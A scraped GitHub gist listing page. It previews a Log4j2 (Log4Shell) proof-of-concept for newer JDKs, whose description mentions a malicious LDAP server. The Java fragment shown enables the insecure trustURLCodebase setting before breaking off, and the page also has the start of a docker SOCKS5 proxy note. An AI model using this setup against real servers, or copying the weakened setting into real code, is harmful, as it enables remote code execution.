Skip to content

Instantly share code, notes, and snippets.

View yyzsec's full-sized avatar
🐟
摸鱼ing

yyz yyzsec

🐟
摸鱼ing
View GitHub Profile
@kaiili
kaiili / client.java
Created December 10, 2021 08:36
log4j2 高版本jdk的利用。ldapWithCB1.java 是恶意的 ldap服务。client.java 是 log4j2 的poc。tcp.go 是一个 tcp的logger,用于快速检测 log4j是否发起请求。
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class Main {
private static final Logger LOGGER = LogManager.getLogger();
public static void main(String[] args) {
// 打开 com.sun.jndi.ldap.object.trustURLCodebase 可以利用
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
// rmi 加上路径后不会 lookup了
// ldap + 反序列化 ok
@alphamarket
alphamarket / http-proxy.conf.md
Last active January 14, 2025 04:25
How to make docker pull using a socks5 proxy

Create the config file:

mkdir -p /etc/systemd/system/docker.service.d && \
vi /etc/systemd/system/docker.service.d/http-proxy.conf

Put up the configs: